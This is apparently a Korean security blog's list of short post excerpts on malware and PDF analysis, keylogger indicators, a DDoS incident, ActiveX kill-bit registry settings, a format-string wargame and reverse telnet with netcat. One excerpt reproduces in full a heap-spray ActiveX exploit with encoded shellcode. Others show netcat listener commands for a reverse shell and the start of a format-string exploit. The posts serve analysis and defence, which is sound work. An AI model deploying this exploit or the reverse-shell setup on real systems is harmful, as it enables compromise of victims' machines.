-
제 목 : PDF 파일 분석하기 작성자 : ByJJoon 작성일 : 2009. 8. 18 최근 PDF 관련 취약점이 많이 나오며 PDF 파일에 악의적인 스크립트가 삽입되는 사례가 많이 발견되고 있습니다. PDF 파일에 악의적인 스크립트가 삽입되었는지 여부를 확인하기 위해 이 문서를 작성합니다. 사용되는 툴 pdf-parser (http://blog.didierstevens.com/programs/pdf-tools) PDFiD (http://blog.didierstevens.com/programs/pdf-tools) Malzilla (http://malzilla.sourceforge.net/downloads.html) 이번 문서에서는 위의 툴들을 사용할 것입니다. 위의 […]
-
제 목 : Malzilla를 이용한 악성 스크립트 분석 작성자 : ByJJoon 작성일 : 2009. 8. 1 서론 최근 국내 웹페이지들이 주말을 기점으로 대대적으로 악성코드가 삽입되는 사례가 많이 발견되고 있습니다. 이러한 악성코드가 삽입된 웹페이지 분석 시 좀 더 빠르고 심도있게 분석하여 최종 다운로드 URL을 빨리 파악하여 악성코드를 다운로드 받아 빠르게 대응하고자 해당 문서를 작성 합니다. 들어가기에 […]
-
키로거 판단 여부조건 1.SetWindowsHookExInt idHook 값이 2조건 2.GetKeyboardState/GetKeyState 존재조건 3.ToAscii 자세한 내용은 쿨켓님의 블로그 ( http://xcoolcat7.tistory.com/542) 참고.
-
어제 국내외 기관, 은행, 포털사이트에 대한 대규모적인 DDOS 공격으로 인해 사이트가 마비되는 상황이 발생했다.[관련기사]이유는 바로 악성코드에 의한 DDOS! – [링크]이번에 이렇게 크게 이슈가 되기 전에 TCP/UDP 80번 포트에 대한 징후가 보이기 시작했었는데……앞으로는 이러한 증상 발생 시, 우선 DDOS를 의심하여 해당 샘플을 확보하여 분석토록 하자!기억 하자 -_- (스트링만 뽑아 봤어도……)그리고 마지막으로 웃긴 캡쳐 하나!
-
var appllaa='0'; var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa; var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDCE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD var headersize=20; var omybro=unescape(nndx); var slackspace=headersize+dashell.length; while(omybro.length<slackspace) omybro+=omybro; bZmybr=omybro.substring(0,slackspace); shuishiMVP=omybro.substring(0,omybro.length-slackspace); while(shuishiMVP.length+slackspace<0x30000) //生成大量?据 shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array(); for(x=0;x<300;x++) memory[x]=shuishiMVP+dashell; var myObject=document.createElement('object'); DivID.appendChild(myObject); myObject.width='1'; myObject.height='1'; myObject.data='./logo.gif'; //一?非GIF文件 myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; 현재 패치가 안나온 상태이며 임시로 Kill Bit 설정이 필요해 보인다. 설정법은 https://jjoon.net/page/?p=33 참조. 기타 국내 사이트 정보 – Ahnlab ASEC Threat Research […]
-
HKEY_LOCAL_MACHINE\software\microsoft\Internet Explorer\ActiveX Compatibility{차단할 CLSID} 위의 레지스트리 경로에 차단하고자 하는 CLSID를 등록 후 Compatibility Flags 를 DWORD 값으로 0x00000400 설정하면 더이상 Internet Explorer에서 해당 CLSID의 프로그램이 동작하지 않아요 ~
-
[탐색기 폴더 옵션의 파일 숨김 속성]HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue 계속 추가 중…….
-
/ 해당 문서는 공부를 하며 정리한 내용으로 틀린 부분이 있을수도 있습니다. / 해커스쿨 level20 문제를 풀어보면서 FSB (Format String Bug)에 대해 알아보자. #include <stdio.h> main(int argc,char **argv) { char bleh[80]; setreuid(3101,3101); fgets(bleh,79,stdin); printf(bleh); } 문제 소스는 다음과 같다. FSB는 printf(bleh) 와 같이 프로그래머의 귀차니즘(?)으로 인해 발생한다. 풀이과정은 다음과 같다. [level20@ftz level20]$ (python -c “print ‘AAAA’ […]
-
창원대학교 홈페이지를 예로 들어 설명 하겠습니다. 창원대 홈페이지의 IP 주소는 203.246.1.5 입니다. 이것을 Sngle decimal IP 로 변환 해보겠습니다. . 단위로 끊어서 16진수로 변환하고 16진수로 변환한것이 한자리수 일때는 앞에 0을 붙입니다. 203 = CB 246 = F6 1 = 01 5 = 05 이것을 붙여서 쓰고 다시 10진수로 변환하면 CBF60105 = 3421896965 이렇게 변환이 됩니다. […]
-
리버스 텔넷은 뜻 그대로 서버에서 본인의 컴퓨터로 텔넷으로 접속하게 하는 기술 입니다. 일반 적으로는 본인의 컴퓨터가 클라이언트가 되고, 접속하고자 하는 상대방의 컴퓨터가 서버가 되지만 리버스 텔넷은 이것이 반대가 된 주객이 전도된 상황을 의미 합니다. 이는 Netcat을 이용하여 할 수 있습니다. 윈도우 상이라면 자신의 컴퓨터에 2개의 콘솔창을 띄웁니다. nc -l -p 1024 nc -l -p 2048 […]